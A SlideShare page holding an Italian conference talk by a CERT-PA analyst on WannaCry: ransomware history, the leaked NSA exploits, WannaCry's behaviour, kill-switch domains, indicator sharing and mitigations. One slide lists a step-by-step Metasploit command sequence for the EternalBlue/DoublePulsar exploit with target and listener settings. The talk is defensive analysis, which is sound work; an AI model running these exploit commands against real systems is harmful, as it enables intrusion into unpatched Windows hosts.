Privacy in enigmate
 
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioniBackdoor Coding: Analisi di una semplice backdoor e prime applicazioni
Backdoor Coding: Analisi di una semplice backdoor e prime applicazioni
 
Programma il futuro: una scelta open source
Programma il futuro: una scelta open sourceProgramma il futuro: una scelta open source
Programma il futuro: una scelta open source
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdf
 

Plus de Gianni Amato

Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioGianni Amato
 
DOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformDOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformGianni Amato
 
Il CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studioIl CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studioGianni Amato
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Gianni Amato
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockGianni Amato
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amatoGianni Amato
 
Reati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliReati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliGianni Amato
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case StudyGianni Amato
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneGianni Amato
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorniGianni Amato
 
Internet Forensics
Internet ForensicsInternet Forensics
Internet ForensicsGianni Amato
 

Plus de Gianni Amato (12)

Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggio
 
DOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformDOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence Platform
 
Il CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studioIl CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studio
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - Shellshock
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amato
 
Reati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliReati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni Digitali
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case Study
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e Validazione
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorni
 
Internet Forensics
Internet ForensicsInternet Forensics
Internet Forensics
 
Firma Digitale
Firma DigitaleFirma Digitale
Firma Digitale
 

Il venerdì nero di wannacry

  • 1. Il Venerdì nero di Wannacry Gianni ‘guelfoweb’ Amato Bologna, 14 Ottobre 2017 HackInBo
  • 2. HackInBo Winter Edition 2017 About me ● Name: Gianni Amato ● Nickname: guelfoweb ● Email: guelfoweb@gmail.com ● Web: www.guelfoweb.com ● Twitter: @guelfoweb
  • 3. HackInBo Winter Edition 2017 Agenda ● Ransomware ○ Come li avevamo conosciuti ○ Come si sono evoluti ● Leak ○ CIA ○ NSA ● Il weekend nero ○ Analisi di Wannacry ○ Evoluzioni
  • 4. HackInBo Winter Edition 2017 Ransomware: Come li conoscevamo
  • 5. HackInBo Winter Edition 2017 C’era una volta MBR Lock ...correva l’anno 2012 ● Master Boot Record compromesso; ● MBR originale sostituito con MBR proprietario; ● Dati sul disco integri, sistema non è accessibile; ● Per ottenere la password era necessario chiamare un numero a pagamento per ricevere il codice (c0d3).
  • 6. HackInBo Winter Edition 2017 Soluzione ● Era sufficiente ripristinare il Master Boot Record per accedere al sistema. ● Analisi successive hanno dimostrato che il codice accetta come password qualsiasi stringa composta da 14 cifre.
  • 7. HackInBo Winter Edition 2017 Ransomware: Come si sono evoluti
  • 8. HackInBo Winter Edition 2017 Varianti 2014 - 2015 2014 - CTB Locker ● utilizza Tor per raggiungere il C&C ● componenti Tor embedded ● distribuito tramite Drive-by download e Spam 2015 - TeslaCrypt ● destinato alla cummunity di videogiochi, successivamente esteso ai classici documenti ● elimina le Shadow Copy e i punti di ripristino ● distribuito attraverso i kit di Angler, Sweet Orange e Nuclear exploit. Download inconsapevole: ● Pop-up ● Error message ● Redirect ● Exploit
  • 9. HackInBo Winter Edition 2017 Varianti 2015 - 2016 2015 - 2016 – MSIL ● sfrutta i server Web vulnerabili Java (JBoss obsolete) ● funzionalità di trojan ● utilizza psexec.exe per veicolare il malware verso host della stessa rete 2016 – Locky ● si propaga attraverso messaggi di posta elettronica ● allegati MS Office (macro) o compressi (.rar, .zip) con JS ● distribuito utilizzando il kit Nuclear Exploit
  • 10. HackInBo Winter Edition 2017 Tecniche di evasione ● Differenti vettori di infezione ○ Exploit Kit ● Offuscamento del codice ○ Codifica ● Riconoscimento dell’ambiente ○ Fisico, virtuale, sandbox ● Rilevamento dei tool di analisi in esecuzione sul sistema ○ Strumenti di debug e di monitoraggio del traffico
  • 11. HackInBo Winter Edition 2017 Scripting L'uso di tecniche di scripting non è nuovo (VBS, HTA, JS, PS) ● facili da offuscare ● difficili da individuare ● nella maggior parte dei casi sono dei downloader ● spesso richiamano altri script ● tutelano il malware vero e proprio https://a.pomfe.co/lmvkqth.jpg https://infosec.cert-pa.it/analyze/e10bdb0fe7ad6fed9e8dcc4418aede45.html
  • 12. HackInBo Winter Edition 2017 Locky encoded https://gist.github.com/guelfoweb/1b7c4ecc3a2a7d8947ad
  • 13. HackInBo Winter Edition 2017 Ransomware + Exploit Kit
  • 14. HackInBo Winter Edition 2017 Leak: Armi digitali trafugate a CIA e NSA
  • 15. HackInBo Winter Edition 2017 Marble Framework Marzo 2017 - Set di strumenti in grado di: ● Offuscare codice nocivo; ● Implementare tecniche Anti-Forensics. Allo scopo di: ● Mascherare malware, trojan e attacchi di hacking; ● Evitare che un attacco possa essere ricondotto alla CIA.
  • 16. HackInBo Winter Edition 2017 Vault7: Source Code ● Russo ● Cinese ● Arabo ● Farsi Mascherare gli hack della CIA e concentrare l’attenzione degli investigatori su altri Paesi.
  • 17. HackInBo Winter Edition 2017 Hacking Tools ● The Shadow Brokers ○ Equation Group ■ NSA Il primo annuncio del leak risale al 13 agosto 2016 (via twitter)
  • 18. HackInBo Winter Edition 2017 MS16-114 - SMB 1.0 Protocollo Obsoleto! Il 13 settembre 2016 - appena un mese dopo l’annuncio del leak - Microsoft informa gli utenti di una importante vulnerabilità che affligge il protocollo SMB 1.0 e che consentirebbe l’esecuzione di codice remoto. Per ragioni di sicurezza Microsoft invita gli utenti a disabilitare il protocollo obsoleto. “If you have not already, follow the instructions in the blog to turn off SMB1 in your environment. You do not need this 30-year-old protocol, and you certainly do not want it.” - Microsoft.
  • 19. HackInBo Winter Edition 2017 MS17-101 - SMB 1.0 Patch Il 14 marzo 2017 Microsoft rilascia un aggiornamento risolutivo per la vulnerabilità nel protocollo SMB 1.0 annunciata nel settembre 2016.
  • 20. HackInBo Winter Edition 2017 Eternal* 14 Aprile 2017 – Microsoft dirama i risultati di analisi interne che riguardano la pubblicazione di alcuni exploit sottratti a «Equation Group» (NSA) rilasciati pubblicamente da un gruppo di hacker noto come «The Shadow Brokers».
  • 21. HackInBo Winter Edition 2017 The Black Friday: WannaCry
  • 22. HackInBo Winter Edition 2017 Venerdì, 12 Maggio 2017 CCN-CERT (Spagna) Il primo CERT, almeno in Europa, a diramare la notizia di un attacco massivo è il CERT spagnolo. https://www.ccn-cert.cni.es/seguridad-al-dia/comunic ados-ccn-cert/4464-ataque-masivo-de-ransomware-q ue-afecta-a-un-elevado-numero-de-organizaciones-es panolas.html
  • 23. HackInBo Winter Edition 2017 È questione di minuti... ● Telefonate ● Messaggi ● Email ● Collaborazione tra CERT a livello europeo; ● Infosharing tra CERT italiani. ● Infosharing con Vendor ● Collaborazione tra ricercatori di tutto il mondo; ● Public infosharing su Twitter, AlienVault (IoC), GitHub.
  • 24. HackInBo Winter Edition 2017 Cosa emerge dalle prime informazioni Sistemi affetti: ● Microsoft Windows Vista SP2 ● Windows Server 2008 SP2 e R2 SP1 ● Windows 7 ● Windows 8.1 ● Windows RT 8.1 ● Windows Server 2012 e R2 ● Windows 10 ● Windows Server 2016 Sistemi affetti fuori supporto: ● Microsoft Windows XP
  • 25. HackInBo Winter Edition 2017 Quali danni ha provocato? ● 300.000 (?) computer compromessi in oltre 150 paesi in meno di 24 ore; ● In Spagna è stata confermata la compromissione di grosse aziende tra cui la compagnia di telecomunicazioni "Telefonica"; ● In Gran Bretagna pare che il ransomware abbia preso in ostaggio i PC di alcuni ospedali e strutture sanitarie.
  • 26. HackInBo Winter Edition 2017 Phishing o Worm? Si presume che il malware si sia propagato inizialmente tramite posta elettronica, ma al momento non esiste una traccia ufficiale in circolazione che confermi l'ipotesi. Non è ancora stato individuato il paziente zero.
  • 27. HackInBo Winter Edition 2017 Come lavora? ● Sfrutta l'exploit di Equation Group (NSA) noto come "EternalBlue" applicabile al protocollo Windows SMB. ● Una volta infettata una macchina, il malware provvede a scansionare la rete interna alla ricerca di altre postazioni affette dalla medesima vulnerabilità. ● Individuata la postazione vulnerabile viene eseguito l'exploit per ottenere accesso al sistema e successivamente cifra i file in esso contenuti rinominandoli con estensione ".WCRY". ● Per recuperare i dati in ostaggio viene chiesto un riscatto iniziale di 300$ in bitcoin, il prezzo sale man mano che scorre il conto alla rovescia del timer mostrato all'utente.
  • 28. HackInBo Winter Edition 2017 Esistono soluzioni? ● Installare la patch MS17-010; ● Bloccare SMB 1 e 2; ● Mitigare la contaminazione sfruttando al meglio gli IoC. ○ Hash, Imphash, IP, Domain, Registry key, Prima informativa sul sito ufficiale CERT-PA ● https://www.cert-pa.it/web/guest/news?id=8342
  • 29. HackInBo Winter Edition 2017 Sample su sandbox online La presenza online del primo sample su Malwr risale al 12/05/2017 @ 10:19 Dalle analisi automatiche nelle sandbox online non emergono evidenti informazioni relative alla propagazione. ● https://malwr.com/analysis/MTlhYjAzNTExNjllNGU0YThmMTRlZTRiOWE4YzhkZDI/ ● https://www.reverse.it/sample/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703 480b1022c?environmentId=100
  • 30. HackInBo Winter Edition 2017 Analisi preliminari Nome dominio (non registrato)
  • 31. HackInBo Winter Edition 2017 Infosec analysis
  • 32. HackInBo Winter Edition 2017 Monitoraggio delle informazioni
  • 33. HackInBo Winter Edition 2017 IoC Sharing Problematiche riscontrate: ● Verifica dell’attendibilità ● Formati differenti ● Conversione in formato testuale ● Separatori improvvisati ● Rimozione dei duplicati ● Gestione dei feedback
  • 34. HackInBo Winter Edition 2017 Hashr ● È un tool scritto e mantenuto dagli analisti del CERT-PA ● Consente di computare hash dei file e ricercare corrispondenza su una lista di hash predefinita (ad esempio IoC di hash); ● Distributito alla constituency; ● Tipologie di ricerche ○ ricorsive ○ per tipologia di file ● Non è di pubblico dominio
  • 35. HackInBo Winter Edition 2017 Microsoft rilascia Patch per Windows XP https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
  • 36. HackInBo Winter Edition 2017 Kill-Switch ● ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf[.]com ● ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com ● iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com ● iuqerfsodp9ifjaposdfjhgosurijfaewrwergweb[.]com ● iuqerssodp9ifjaposdfjhgosurijfaewrwergwea[.]com ● iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com Un eroe per caso?
  • 37. HackInBo Winter Edition 2017 Nuove varianti Poche ore dopo la notizia dell’esistenza di un kill-switch, si ha evidenza di nuovi sample: ● con kill-switch differenti ● senza kill-switch
  • 38. HackInBo Winter Edition 2017 Kill-Switch e Proxy INTERNET_OPEN_TYPE_DIRECT (Resolves all host names locally.) https://blog.didierstevens.com/2017/05/13/quickp ost-wcry-killswitch-check-is-not-proxy-aware/
  • 39. HackInBo Winter Edition 2017 Sezione Resource La sezione «Resource» contiene un eseguibile, un pacchetto di circa 3,5 MB https://infosec.cert-pa.it/analyze/db349b97c37d22f5ea1d1841e3c89eb4.html
  • 40. HackInBo Winter Edition 2017 MSSECSVC2.0 Il worm installa un servizio denominato “mssecsvc2.0”. Nome visualizzato: “Microsoft Security Center (2.0) service”. Quando il servizio è installato provvede a caricare i moduli per la cifratura.
  • 41. HackInBo Winter Edition 2017 Network traffic ● Tenta di connettersi alla rete locale alla ricerca di SMB vulnerabile; ● Genera indirizzi IP pubblici casuali per lo stesso scopo; ● Se trova una postazione vulnerabile, viene trasferito il malware ed eseguito su di esso. path/to/mssecsvc -m security
  • 42. HackInBo Winter Edition 2017 Folder dropped Public Key Private Key
  • 43. HackInBo Winter Edition 2017 Persistenza HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
  • 44. HackInBo Winter Edition 2017 Da analisi successive ● Cifra 177 tipologie di file ● .wnry, .wcry, .wncry, .wncrypt ● RSA-2048 encryption keys with AES-128 encryption ● SMB Exploit (MS-17010) EternalBlue ● Sezione Resources contiene un pacchetto eseguibile ● TOR C&C ● Diversi indirizzi Bitcoin ● DNS Kill-Switch ● Persistenza garantita tramite registro di sistema
  • 45. HackInBo Winter Edition 2017 Informazioni condivise ● News ○ https://www.cert-pa.it/web/guest/news?id=8342 ● News ○ https://www.cert-pa.it/web/guest/news?id=8382 ● Info ○ https://www.cert-pa.it/documents/10184/0/Consigli_WCry_CERT-PA6.pdf ● IoC ○ https://www.cert-pa.it/documents/10184/0/WCry.IoC.015.infosharing.xlsx
  • 46. HackInBo Winter Edition 2017 EternalBlue e Metasploit ● msf > use windows/smb/eternalblue_doublepulsar ● msf > exploit (eternalblue_doublepulsar) > set eternalbluepath root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps ● msf > exploit (eternalblue_doublepulsar) > set doublepulsarpath root/Desktop//Eternalblue-Doublepulsar-Metasploit/deps ● msf > exploit (eternalblue_doublepulsar) > set targetarchitecture x64 ● msf > exploit (eternalblue_doublepulsar) > set processinject lsass.exe ● msf > exploit (eternalblue_doublepulsar) > set lhost 192.168.1.2 ● msf > exploit (eternalblue_doublepulsar) > set rhost 192.168.1.3 ● msf > exploit (eternalblue_doublepulsar) > exploit
  • 47. HackInBo Winter Edition 2017 EternalRocks – WannaCry Evolution ● EternalRocks è la versione avanzata di WannaCry ● Oltre gli exploit di WannaCry (EternalBlue e DoublePulsar) sfrutta altri exploit: ○ EternalChampion; ○ EternalRomance; ○ EternalSynergy; ○ ArchiTouch; ○ SMBTouch.
  • 48. HackInBo Winter Edition 2017 EternalRocks in due Step ● 1° STEP: Download TOR client per raggiungere il C&C ● 2° STEP: Dopo 24h arriva la risposta dal C&C che invia un pacchetto denominato «shadowbrokers.zip»
  • 49. HackInBo Winter Edition 2017 EternalRocks nuova variante
  • 50. HackInBo Winter Edition 2017 Similitudini Neel Mehta, ricercatore di Google, ha trovato alcune somiglianze tra una delle prime varianti di WannaCry e una Backdoor usata in passato dal gruppo hacker Lazarus, noto per gli attacchi del 2014 contro Sony. Si ritiene, ma non vi è conferma, che il gruppo Lazarus fosse legato alla Corea del Nord. Symantec ha approfondito l’argomento riportando alcune evidenze.
  • 51. HackInBo Winter Edition 2017 Chi sono i colpevoli? I veri colpevoli sono coloro i quali hanno lasciato esposti e vulnerabili i propri sistemi.
  • 52. HackInBo Winter Edition 2017 Grazie per l’attenzione!